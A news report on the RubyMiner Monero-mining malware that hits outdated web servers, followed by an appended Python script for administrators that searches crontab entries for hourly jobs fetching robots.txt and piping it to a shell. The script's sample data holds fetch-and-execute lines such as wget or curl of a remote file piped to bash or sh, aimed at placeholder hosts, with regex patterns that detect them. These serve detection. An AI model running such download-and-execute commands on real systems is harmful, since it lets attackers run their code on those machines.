Security researchers have discovered a new strain of malware named RubyMiner targeting outdated Linux and Windows web servers. The malware is a cryptocurrency miner and installs a modified version of the XMRig Monero miner application on vulnerable systems.

According to Check Point researchers, the attack began on January 9-10, and within 24 hours 30% of networks worldwide experienced compromise attempts by the malware. The malware uses a web server fingerprinting tool called p0f to identify outdated Windows and Linux web servers. Security firm Certego also reported a huge spike in Ruby HTTP exploitation since January 10th.

The top targeted countries include the United States, Germany, the United Kingdom, Norway, and Sweden. Researchers also found targeted attacks on servers like PHP, Microsoft IIS, and Ruby on Rails. Once a target is identified, the attacker exploits multiple web server vulnerabilities to inject malicious code into outdated systems.

“XMRig usually sends a donation of 5% of the revenue gained from the mining process to the code’s author. However, even this amount was too much for the attacker to part with as that ‘donation element’ was deleted from the code, giving the enthusiast 100% of the profit,” Check Point said in its published post.

According to Check Point researchers, as of January 11th the number of infected servers is approximately 700 and the estimated earnings are around $540.

The malware is programmed to run hourly not only the mining process but the whole process, and to download the file from the server. This allows the attacker to initiate an immediate kill switch for the miner bot. To end the process, the attacker just needs to modify the robots.txt file on the compromised web server.

Last week, a Monero miner was discovered on the official website of BlackBerry Mobile. CoinHive’s cryptocurrency code was added to the website to mine Monero.

Users and administrators are advised to patch their servers with the latest updates immediately and take the necessary security precautions to prevent infection.
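For administrators checking their own servers, the hourly re-download of robots.txt described above can be hunted for in scheduled jobs. The following is an added example, not code from this article or from Check Point; it assumes the hourly run is implemented as a cron entry that fetches a robots.txt and pipes it to a shell, and the crontab lines and `example.invalid` hosts are constructed.

```python
import re

# Constructed sample crontab lines (not taken from a real infection).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
1 * * * * wget -q -O - http://host.example.invalid/robots.txt 2>/dev/null | bash >/dev/null 2>&1
@hourly curl -s http://cdn.example.invalid/robots.txt | sh
*/5 * * * * curl -s https://status.example.invalid/health
30 2 * * 1 wget -q https://www.example.invalid/robots.txt -O /tmp/robots-audit.txt
"""

# A download tool fetching robots.txt (before any pipe), and output piped to a shell.
FETCH = re.compile(r"\b(?:wget|curl)\b[^|]*\brobots\.txt\b", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/\S*/)?(?:ba|da|z|k)?sh\b", re.I)


def schedule_and_command(line):
    """Split a crontab line into (is_hourly, command); None for non-job lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):
        tag, _, cmd = line.partition(" ")
        return tag == "@hourly", cmd.strip()
    parts = line.split(None, 5)
    if len(parts) < 6:  # e.g. MAILTO=root or a malformed entry
        return None
    minute, hour = parts[0], parts[1]
    # "once per hour": fixed minute, wildcard hour
    return minute.isdigit() and hour == "*", parts[5]


def find_suspicious_jobs(crontab_text):
    """Return jobs that download robots.txt and execute it through a shell."""
    hits = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        parsed = schedule_and_command(line)
        if parsed is None:
            continue
        hourly, cmd = parsed
        if FETCH.search(cmd) and PIPE_TO_SHELL.search(cmd):
            hits.append({"line": lineno, "hourly": hourly, "command": cmd})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_jobs(SAMPLE_CRONTAB):
        print(hit)
```

A job that only saves robots.txt to a file, such as the last sample line, is not flagged; the signal is the combination of fetching the file and executing it.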